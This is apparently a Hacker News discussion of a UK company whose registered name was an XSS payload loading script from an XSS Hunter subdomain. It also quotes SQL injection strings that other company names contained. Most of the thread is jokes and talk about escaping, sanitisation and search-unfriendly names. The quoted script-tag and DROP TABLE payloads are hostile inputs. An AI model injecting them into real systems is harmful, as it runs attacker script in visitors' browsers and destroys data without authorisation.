That company whose name used to contain HTML script tags Ltd (service.gov.uk)
436 points by marinintim 31 days ago | 154 comments



Nice to see Bobby Tables is all grown up.

Relevant discussion on the Companies House Developer Forum:

https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...



I was wondering how much it costs to open a company in the UK to do something like that, and it seems to be really cheap (and quick):

a) Incorporate directly via Companies House

The standard registration fee to set up a company is just £12 for the ‘standard’ Companies House web incorporation service, which takes up to 24 hours to turnaround. You can pay via credit card, debit card or PayPal.

Source: https://www.itcontracting.com/how-much-limited-company-cost/


Yes, it is. Do they still require a minimum of two officers?

(Spam warning: if you form a company at your home address, you will be inundated with paper spam for office equipment. Especially from Dell.)


I have a ltd company registered at home and I got sent a pen with the company name engraved on it - nice spam :)

I also had a letter telling me I was the beneficiary of a few million dollars which was less useful :)


No. You can do it with one person.


Not many DBMSs support stacked queries, I'd guess.


Hilarious!


This reminds me of a story I saw on Reddit once. A man worked for a payment processing firm that didn't sanitize their database inputs at all.

One day, they get a new customer called "Select". Absolutely everything stopped working.


I'm disappointed that the discussion seems more about debating whether that person acted in good faith or that the law regarding acceptable characters in company names should be changed, as opposed to the bigger concern of why were they not sanitizing company names? Even without intent to insert HTML, characters such as < or > would still break their pages.
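
To make the escaping point concrete, here is a minimal sketch in Python of output encoding at render time. `render_company_cell` is a hypothetical helper, not code from Companies House or any real aggregator, and the name used is the former company name as reported in this thread.

```python
import html

# The former company name as reported in this thread.
NAME = '\\"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD'


def render_company_cell(name: str) -> str:
    """Hypothetical helper: build a table cell with the name HTML-escaped."""
    # html.escape replaces &, < and >, and by default both quote characters,
    # so the browser displays the name as text instead of parsing it as markup.
    return f"<td>{html.escape(name)}</td>"


print(render_company_cell(NAME))
```

Escaping at output time, rather than rejecting characters at registration, means a legally valid name with < or > in it is stored unchanged and only encoded where it is written into HTML.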


Relevant context: https://twitter.com/zofrex/status/1319286955314614275

Apparently the name used to be

    \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD


New name is disappointing. The company should at least be renamed to:

    \&quot;&gt;&lt;SCRIPT SRC=MJT.XSS.HT&gt;&lt;/SCRIPT&gt; LTD


How about EICAR ANTIVIRUS TEST FILE? Or the DeCSS key?


hitting mjt.xss.ht returns this:

/* THIS SUBDOMAIN HAS BEEN BANNED FROM THE XSS HUNTER SERVICE.

WE DO NOT ALLOW ABUSE OF OUR SERVICE, ALL SECURITY TESTING MUST BE AUTHORIZED.

Please use our contact form if you believe this ban was a mistake: https://xsshunter.com/contact */


It previously returned an XSS test payload https://pbs.twimg.com/media/ElAYZTcX0AEyFUY?format=jpg&name=...


The character set used looks to be specifically authorized by law[1] so this doesn't appear to be unauthorized testing.

1. https://news.ycombinator.com/item?id=24921261


But not authorized by all the company register clone sites that would have triggered this. The service appears to be for testing your own site.


Will that even work without http:// or at least // in front of the domain name?

Tried it in Chrome and it sees it as a file name on the current domain.


Seems to have a bit. Cut and paste from the guy who set up \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

>I am in the process of contacting every website that has triggered my script which has a readily available contact for submitting security issues, or a hackerone account or similar. Alas, the sort of websites that have XSS problems rarely list IT security contacts.


I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?
See https://tools.ietf.org/html/rfc3986#appendix-B

The authority section (which contains the host domain) must begin with "//" whether there's a scheme prefix or not. Otherwise it's just part of the path (or query or fragment). IIRC, these semantics are also fixed by HTML such that any attribute like HREF or SRC is parsed as-if using the canonical regex (but after entity substitution and whitespace trimming). Browsers might have implemented this differently many years ago, but I doubt it as it would conflict with being able to use a bare path atom (e.g. foo.html).

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.
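
A quick way to check this is to run the Appendix B expression directly. The sketch below is in Python; `split_uri` is a hypothetical helper name, and `https://example.com/company/123` is an assumed base page used only for illustration.

```python
import re
from urllib.parse import urljoin

# Regular expression from RFC 3986, Appendix B.
URI_RE = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")


def split_uri(ref: str) -> dict:
    """Split a URI reference into the five components named in the RFC."""
    m = URI_RE.match(ref)  # every group is optional, so this always matches
    return {
        "scheme": m.group(2),
        "authority": m.group(4),
        "path": m.group(5),
        "query": m.group(7),
        "fragment": m.group(9),
    }


# Without a leading "//" the whole string lands in the path component.
bare = split_uri("MJT.XSS.HT")

# With "//" the same string is parsed as the authority (host).
network = split_uri("//MJT.XSS.HT")

# Resolving the bare form against an assumed base page keeps the base host.
resolved = urljoin("https://example.com/company/123", "MJT.XSS.HT")

print(bare, network, resolved, sep="\n")
```

So a bare `SRC=MJT.XSS.HT` would be fetched as a relative path on whatever site rendered the name, which matches the Chrome observation earlier in the thread.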


It had HTTP originally, twitter just munged it.


You would think if you go to all the trouble to register a company name, you would at least use a domain you control


There's a great club in Berlin called "://about blank"

So if you're gonna Google it, don't use the URL bar.


My favourite social establishment is The Progress Bar.


Nice spot, but the lines are always so long. Fortunately you always know how long you have to wait.


Fun fact: It's currently law that you can have the <> and "" characters in your name.

https://www.legislation.gov.uk/uksi/2015/17/schedule/1/made


What's really fun is many companies' forms don't allow for companies to have any punctuation in their name.


I think I'd excited that as Schedule 1 of this Act doesn't exclude those characters.

For example you can use the characters w,i,n,d,s,o,r but catenated in an ordered string means you have to get special permission.

Arguably the attempt to register this was an attempt to breach the Computer Misuse Act (which would make it illegal).


It’s been 13 years since the Bobby Tables comic was drawn, has nobody actually tried it yet?



What I mean is, has nobody named their child after an SQL injection payload?


LOL!



On a related topic, the name of the company I work for starts with a colon. The rest of the name is a common adjective. As you can imagine, it is virtually ungooglable at the moment. Any thoughts on how to get around this?


Just change the name. It'll be easier and more cost effective in the long run.

I've started working with some software called STACK recently, and it's almost impossible to find anything by searching (go ahead and try!). If it was a commercial product they would be sunk.


At least if it's Haskell's stack build tool, adding the language name to the query makes it pop right up. Not sure if this helps in your case though.


I found your company name in your profile - ":different"

Even if I google ":different" company or without the colon, the top result for me is a parfumerie.

When I google different australia, you're the top result.


Surprised New Zealand isn't the top result when you Google "different Australia"


I thought that different Australia is Austria.


Because it's East Australia


More like Australia is the West Island of NZ.


better find a nickname, like D's community did, using dlang lol otherwise no one could find anything on language googling


The Go community had to do the same. Go. A language created by a company that makes a well known search engine.


But by staff who have worked on Plan 9, right?


Those people made it so that one-letter identifier names and junk like ‘fmt’ and ‘Fprintln(w)’ is again okay. So the unusable name fits the spirit quite well.


Sometimes obscurity, as well as tweaking your nose at convention, is a feature.


how hard would it be to learn BASIC using Google? "Basic Programming" is going to have a lot of irrelevant results.


DDG'd

  BASIC programming
all the results were about BASIC, the wiki page to start with, then

* BASIC Programming : 7 Steps - Instructables

* Learn More - Just BASIC

* The History of the BASIC Programming Language

* Programming in BASIC: the absolute beginner tutorial

* FreeBASIC Language | Home

* PureBasic - A powerful BASIC programming language

* Quite BASIC — fun, learning and nostalgia

* World of Spectrum - Documentation - ZX Spectrum manual

Only after all that is a non-basic link

* Introduction | Programming for Beginners


Searched BASIC programming on Google and it also returned results relevant to the actual programming language


BASIC programming ironically may return better results than if you search for something about a more mainstream current language e.g. python. I often find the first few results are some search engine spam... tutorialspoint or geeksforgeeks etc, when a link to the API would be the logical first result. (Usually the first link to the api is for 3.4 or some random version also)


I've often wondered if any metallurgists have tried to run computer simulations of the annealing process. How would you find their research if they had?


Actually yes :) At least the optimization crowd don't use the phrase 'heat treatment', which helps somewhat. But who I really feel bad for is the recruiters trying to hire a chemist who specialises in the element lead.


BRB: going to SEO spam my simulated annealing NPM library homepage with "heat treatment"...


Try it! Nearly every result is related to BASIC. Search engines have gotten very good at guessing what is and isn't a proper noun over the years.


I don't know whether they actually do it but it seems really easy to treat "BASIC" as a distinct idiomatic token from "basic" when the searcher bothers to get the casing right.


It really is amazing how big a difference this makes.

I've started using Apple's Aperture software recently (I'm well aware it's been discontinued). I really like it, but my biggest frustration is that it's difficult to learn how to do new things, because "aperture" is a generic word in photography. I can't search for the name and get results about the software.


One of my favorite mobile games is Antiyoy, by Yiotro (https://github.com/yiotro/Antiyoy) who also created other games like Vodobanka, Achikaps, and Bleentoro.

The creator mentioned that he picked the names because they were pronounceable, unique, memorable, and searchable. That misses out on meaningfulness and familiarity, but those are expensive - by dropping those requirements, you gain easy SEO, trademarks, domains, etc. A big company knowing they're going to sell millions of copies can spend 5 figures on a domain and 6 figures on SEO, but I don't think it's worth it for most startups.



Huh, I play these and I didn't know that's why they had these names, I assumed they were compound words in some language I didn't know. This is like a reverse "XKCD" naming convention.

Also relevant: "Change Your Name" http://www.paulgraham.com/name.html


>I'm well aware it's been discontinued

Limiting the dates to indexes before 2016 might help (at least with google). You can usually train google to get you what you want after a few searches. This was initially a problem with the Elixir programming language, but it learned what I actually wanted it started letting me just type in the term elixir without specifying it was a programming language. On other computers not associated with that account, it does revert back to the not-so-useful results.

e.g.

    apple "aperture" color correction before:2016


> but it learned what I actually wanted it started letting me just type in the term elixir without specifying it was a programming language

Oh, you know what, this might be largely my own fault. I purposefully use Startpage.com as my search engine in order to avoid getting customized results (while still using Google's index).

I worry that customized results put me in a filter bubble—but they certainly have their advantages!


The band Chvrches chose to use the Roman "u" to spell their name so they'd be easier to search.


Kind of hard to pronounce though. Like that jewellery brand, seemingly pronounced 'buffelgary' or something.


Sorta. It's still pronounced "churches", but it's definitely a common joke to pronounce it chivurches.


See also "Pages", "Numbers", "Keynote"...

Apple don't give a fuck.


No lies detected, but because they aren't professional software I don't have to search for stuff as often. And the other "Professional" Apple app I use is Final Cut Pro, which doesn't similarly have this problem.


Back when I worked at a comparison shopping engine, I had a bit of a laugh when I saw that the indexing pipeline was generating error messages because the "clean" function returned empty for some products in the feed from Amazon, because they had names like "++++++".

It was usually musical albums that liked to have names that made it impossible for fans to find the music.
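
For illustration only, here is roughly how that failure can happen. This is a sketch in Python; `clean` and `index_key` are hypothetical stand-ins, not the actual pipeline's functions.

```python
import re


def clean(name: str) -> str:
    """Hypothetical cleaner: keep only ASCII letters, digits and spaces."""
    return re.sub(r"[^A-Za-z0-9 ]+", "", name).strip()


def index_key(name: str) -> str:
    """Fall back to the raw name when cleaning leaves nothing to index."""
    return clean(name) or name


for title in ["++++++", "!!!", "The The"]:
    print(repr(title), "->", repr(clean(title)), "/", repr(index_key(title)))
```

A name made only of punctuation cleans to the empty string, so an indexer that requires a non-empty key has to either fall back to the raw name, as `index_key` does here, or report an error.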


> Musical albums that liked to have names

The band 'Audiobooks' has taken this to the next level


I like the band A. When I try to find their music though...

https://en.wikipedia.org/wiki/A_(band)


Anyone else remember "The The"?

(Or for a more modern example "!!!")


In another era, “+++ATH” would have been a good name.


Don’t go with !!!

You’ll never find them on YouTube or google unless you search for their informal name: chk chk chk


However, they benefitted greatly in the early ‘00s. If you had them in your Apple Music library, iTunes always put them at the top of your alphabetical music library, keeping them top of mind, because ! comes before A. There might have been a similar iTunes Store benefit too.

Terrible Google SEO, great accidental Apple SEO.


I always thought the best name for a band with only one album would be 'Various Artists' with 'Greatest Hits' for the album name.

They probably exist, I just don't think I can ask a search engine to find them.


https://www.discogs.com/artist/35584-Various-Artists-3

In 1997 Torsten Pröfrock released a highly sought-after dub techno album on the legendary Chain Reaction label under the name "Various Artists". It's a quintessential record in the Basic Channel genre. You can listen to it here: https://youtu.be/3165Sf-q8dY


I've seen a band called Special Guests.


"The The" was a pretty notable band in the 80s/90s.


There used to be a local Sydney band called "Free Beer", so the posters for all their support slot gigs would say "$HeadlineAct with Free Beer".


couldn't be any worse than the band names "A" and "My Computer" !

https://acommunication.co.uk

https://en.m.wikipedia.org/wiki/My_Computer_(band)


Google have a hardcoded exception for the band "the the".


SiriusXM truncates a "The" prefix from artist names (so "The Cure" and "The Who" become "Cure" and "Who"). I always wondered how it would display The The. Would it be "The The" (special case), "The" (default removal of "The"), or an empty string "" (in the unlikely case the algorithm recursively removed "The" prefixes)? Eventually they played a The The song and the answer is "The The".
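
The three possibilities can be sketched in a few lines of Python. All three functions are hypothetical; nothing here is known about how SiriusXM actually implements this, and the guard is just one rule that would produce the observed result.

```python
def strip_once(name: str) -> str:
    """Drop a single leading "The"."""
    words = name.split()
    if words and words[0] == "The":
        words = words[1:]
    return " ".join(words)


def strip_recursive(name: str) -> str:
    """Keep dropping leading "The" until none is left."""
    words = name.split()
    while words and words[0] == "The":
        words = words[1:]
    return " ".join(words)


def strip_with_guard(name: str) -> str:
    """Drop one "The", but keep the original if only "The" or nothing remains."""
    stripped = strip_once(name)
    return name if stripped in ("", "The") else stripped


for artist in ["The Cure", "The Who", "The The"]:
    print(artist, "|", strip_once(artist), "|",
          repr(strip_recursive(artist)), "|", strip_with_guard(artist))
```

Only the guarded variant displays "The The" unchanged while still shortening "The Cure" and "The Who".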


I always liked to imagine filing "The The" under "The, The".


Of course the right way of filing them is autobiographically... (I went to see the Infected tour with Louise, so they're filed under "L"...)


There’s a video on YouTube with three full-width exclamation points as the title. I watched it once, and although it wasn’t particularly interesting, it bugs me that I cannot find it again.


Convince the powers-that-be in your company to invest in contracting with a marketing/SEO person or team to help come up with a new name. You want someone with marketing chops so that it's a good name, but you also want someone who knows about SEO so you don't end up on the second page for your own name search.


Is it "Colon Blow"?


This just made me laugh so hard. Phil Hartman was great. Here's the reference: https://www.youtube.com/watch?v=Ku42Iszh9KM


Launch a multi-million dollar brand advertising campaign.


And I thought Yahoo! (with exclamation mark) had it rough.


At least they're a little better than a hypothetical -"Yahoo" which would return no results for your company at all...


I was curious what googling only a negative query would do and for this, -"Yahoo" returns just the dictionary definition of the word "yahoo" and no search results.


It does that for any "negative term only" search afaict


:oscopy ?


:wq!


I registered <b>Be</b> for a small company a long time ago. I thought it was clever. They folded during the tech bubble.


clearly, it was older as now it would be encouraged to use <strong>Be</strong>


That's actually kind of clever, albeit developer centric.


<b>Be</b>, <strong>be</strong>, but don’t <head>be</head>. That's an illegal act of violence.


isn't it illegal html too? i've never seen raw text in the head tag.


Also, too many vowels for a modern company name.


<blink>Be</blink>


<blink>Blink</blink> -- It's a deprecated tag now, and most browsers don't support it, but I would have loved to have seen that as a company... <marquee> is still supported though....


Bold bee?


Be bold ?


𝗕𝗲


I’ve never seen bold in an HN comment before? How do you do it?


𝐔𝐧𝐢𝐜𝐨𝐝𝐞 𝐡𝐚𝐬 𝐜𝐡𝐚𝐫𝐚𝐜𝐭𝐞𝐫𝐬 𝐭𝐡𝐚𝐭 𝐥𝐨𝐨𝐤 𝐬𝐢𝐦𝐢𝐥𝐚𝐫 𝐭𝐨 𝐟𝐨𝐫𝐦𝐚𝐭𝐭𝐞𝐝 𝐭𝐞𝐱𝐭.

𝗨𝗻𝗶𝗰𝗼𝗱𝗲 𝗵𝗮𝘀 𝗰𝗵𝗮𝗿𝗮𝗰𝘁𝗲𝗿𝘀 𝘁𝗵𝗮𝘁 𝗹𝗼𝗼𝗸 𝘀𝗶𝗺𝗶𝗹𝗮𝗿 𝘁𝗼 𝗳𝗼𝗿𝗺𝗮𝘁𝘁𝗲𝗱 𝘁𝗲𝘅𝘁.

𝑈𝑛𝑖𝑐𝑜𝑑𝑒 ℎ𝑎𝑠 𝑐ℎ𝑎𝑟𝑎𝑐𝑡𝑒𝑟𝑠 𝑡ℎ𝑎𝑡 𝑙𝑜𝑜𝑘 𝑠𝑖𝑚𝑖𝑙𝑎𝑟 𝑡𝑜 𝑓𝑜𝑟𝑚𝑎𝑡𝑡𝑒𝑑 𝑡𝑒𝑥𝑡.

𝘜𝘯𝘪𝘤𝘰𝘥𝘦 𝘩𝘢𝘴 𝘤𝘩𝘢𝘳𝘢𝘤𝘵𝘦𝘳𝘴 𝘵𝘩𝘢𝘵 𝘭𝘰𝘰𝘬 𝘴𝘪𝘮𝘪𝘭𝘢𝘳 𝘵𝘰 𝘧𝘰𝘳𝘮𝘢𝘵𝘵𝘦𝘥 𝘵𝘦𝘹𝘵.

𝑼𝒏𝒊𝒄𝒐𝒅𝒆 𝒉𝒂𝒔 𝒄𝒉𝒂𝒓𝒂𝒄𝒕𝒆𝒓𝒔 𝒕𝒉𝒂𝒕 𝒍𝒐𝒐𝒌 𝒔𝒊𝒎𝒊𝒍𝒂𝒓 𝒕𝒐 𝒇𝒐𝒓𝒎𝒂𝒕𝒕𝒆𝒅 𝒕𝒆𝒙𝒕.

𝙐𝙣𝙞𝙘𝙤𝙙𝙚 𝙝𝙖𝙨 𝙘𝙝𝙖𝙧𝙖𝙘𝙩𝙚𝙧𝙨 𝙩𝙝𝙖𝙩 𝙡𝙤𝙤𝙠 𝙨𝙞𝙢𝙞𝙡𝙖𝙧 𝙩𝙤 𝙛𝙤𝙧𝙢𝙖𝙩𝙩𝙚𝙙 𝙩𝙚𝙭𝙩.

(Don't do this: it's _terrible_ for accessibility, as screen readers can't parse these as regular text)


Can confirm. All I see are [X]'s.

𝐔𝐧𝐢𝐜𝐨𝐝𝐞 𝐡𝐚𝐬 𝐜𝐡𝐚𝐫𝐚𝐜𝐭𝐞𝐫𝐬 𝐭𝐡𝐚𝐭 𝐥𝐨𝐨𝐤 𝐬𝐢𝐦𝐢𝐥𝐚𝐫 𝐭𝐨 𝐟𝐨𝐫𝐦𝐚𝐭𝐭𝐞𝐝 𝐭𝐞𝐱𝐭.

I'm curious if that copied the text or the placeholders. It's like hunter2 for the modern era.


> I'm curious if that copied the text or the placeholders.

It copied the text.


FWIW for most of these sorts of things you can scrub it via passing the text through an NFKC or NFKD transform. I'd hope that a screen reader can be updated to handle this case.
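
As a small illustration of that transform, here is a Python sketch using the standard `unicodedata` module. The sample string is written as escapes so it survives copy and paste; the variable names are only for the example.

```python
import unicodedata

# MATHEMATICAL SANS-SERIF BOLD CAPITAL B followed by
# MATHEMATICAL SANS-SERIF BOLD SMALL E (renders as a bold-looking "Be").
styled = "\U0001D5D5\U0001D5F2"

# Compatibility normalization maps each styled letter to its plain form.
plain_nfkc = unicodedata.normalize("NFKC", styled)
plain_nfkd = unicodedata.normalize("NFKD", styled)

print(plain_nfkc, plain_nfkd)
```

Both forms fold the mathematical letters back to ASCII. Compatibility normalization also changes other characters (ligatures, full-width forms, superscripts), so it suits search keys and accessibility fallbacks better than rewriting the stored text.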



These are Unicode characters intended for use in mathematical formulas, not text, so they break all sorts of things. It might make some sense to use them in mathematical Python code (where they do seem to work), but they're hard to type.


Looks like Unicode characters to me.


Be Best


Here is to the company

  Dariusz Jakubowski x'; DROP TABLE users; SELECT '1
that ran in Poland from 2014 to 2019 [0].

[0] https://prod.ceidg.gov.pl/CEIDG/ceidg.public.ui/SearchDetail... (check the reCAPTCHA and click "Dalej")


I giggled at the previous company name being redacted as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” too. Not sure if that’s a common thing to do or if they made an exception for these shenanigans so they didn’t have to display the XSS.


Now someone just has to register "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]" as a company name...


Kinda tempted to see if Oregon would let me register [REDACTED], LLC

Only 100 dollars...

Edit: Someone beat me to it. Reg #1330411-94


[expletive deleted], LLC


For a minute I thought their name was (without the quotes) "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]".

Seems like a regulation to add "computer code like expressions" to the list that requires prior approval of the Secretary of State might be useful.


That might require a bit more effort on the part of a company I know, who would have to register their logo "moz://a".


That would be a trade mark rather than a company name in this instance I think. In UK registered trademarks are standard type-written letters for word marks. If they contain symbols then they're figurative marks and it's an image of the mark which is registered.

On that point though, searching on the UK trademark registry it looks like it just strips non-alphanumeric symbols. A search for "Moz://a" returns "moza".


And the officer's last name is Tandy. Good computer name :D


I'm slightly surprised that AAISP's RevK isn't behind this one. I'd document his shenanigans but they'd eventually break out of the data set.


Now _that_ is pretty funny. I wonder what the company name is. Even the PDF of the incorporation certificate doesn't show the name.


\"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD


; DROP TABLE "COMPANIES";-- LTD

(Yes, the description is inaccurate.)

Edit: This is a different company, actually.



Outstanding. What a clever, cheeky fellow. Obligatory XKCD: https://xkcd.com/327/


Just never change the name to "null".


Is Companies House's website not done by GDS or something? I worked on a few GDS projects for DFT, we had to have independent pen testers test our services before they moved between phases.


Companies House wasn't compromised, they warned third parties about potential issues with the underlying data.


According to a thread [1] on Companies House's Developer Forum, they were.

[1]: https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...


No I mean the fact that this was possible on their website, XSS is one of the simplest things to test, in fact it was one of the standard tests UI testers would do on new screens.

Not saying they were compromised.


It wasn't possible on their website.

They provide data feeds to many third parties, who might themselves be vulnerable, hence the notification.


It would be interesting to know why the name had to be changed.


Because there are a bunch of companies which do aggregation of information about companies, and not all of them used parameterized SQL queries :-/
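
For the SQL side of this, a parameterized query looks roughly like the following sketch, which uses Python's built-in `sqlite3`. The `companies` table and its single column are assumptions for the example, and the name is the SQL-flavoured one quoted elsewhere in this thread.

```python
import sqlite3

# A company name quoted elsewhere in this thread.
NAME = '; DROP TABLE "COMPANIES";-- LTD'

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE companies (name TEXT)")  # assumed schema

# The "?" placeholder sends the name as data, never as SQL text.
conn.execute("INSERT INTO companies (name) VALUES (?)", (NAME,))

rows = conn.execute(
    "SELECT name FROM companies WHERE name = ?", (NAME,)
).fetchall()
print(rows)
```

The name is stored and read back byte for byte, and the table is still there afterwards.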


This is HTML injection, not SQL.


That’s kind of a minor detail.


Not even all SQL engines support quoting all types of values. BigQuery, looking at you.


And whose problem is that?


On a "what's reasonable" level, or on a "gets you called in by a minister or MP to be yelled at" level?


Solidarity to all of the folks who have had to work with elected officials. I got ripped a new one because, in the mid-2000s, I recommended we disable a PHP project, a hay bale reporting app (it reported counts of hay bales on farms), due to an RCE bug. Within a few hours of the app being disabled there was drama from a politician who got a phone call from a prominent farmer...


Speaking of the power of farmers… https://youtu.be/rStL7niR7gs?t=439 The relevant clip is just 20 seconds long.


That is excellent.

Relevant - John Mellencamp using his hit song to siphon off subsidies to his family and relatives.

https://reason.com/2005/04/15/cash-on-the-scarecrow-pork-on/


Relatedly, several years ago I scraped all companies on the old companies house webcheck site. There were two that interrupted my scraper: both contained '<' in the company name, and both seemed to take the webcheck service offline for a few seconds whenever I requested their pages. I can't say for sure - it might have been a temporary IP block I suppose - but it amused me nonetheless.


This is not a prank, it's the new Companies House search, which still contains some kinks, and I assume they had to work around a very specific one here.


My understanding is that the Companies House search is fine, but various third-party consumers of the list might not be.


Here's an internet archive of the old name on one of those https://web.archive.org/web/20201022184617/https://suite.end...


What was the name? Its former name is listed as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” and its current name doesn’t contain any HTML tags (it’s literally the same as the headline)

Those are both funny and confusing names, but they don’t warrant comparison to sql-injections, so I am guessing there’s another name with actual HTML tags.


There was also this project of Mediengruppe Bitnik (check the video with some online bookstores):

http://p-dpa.net/work/script-alert-mediengruppe-bitnik/



Like little Bobby Drop Tables: https://xkcd.com/327/


hahahahaahaha! is this some prank?



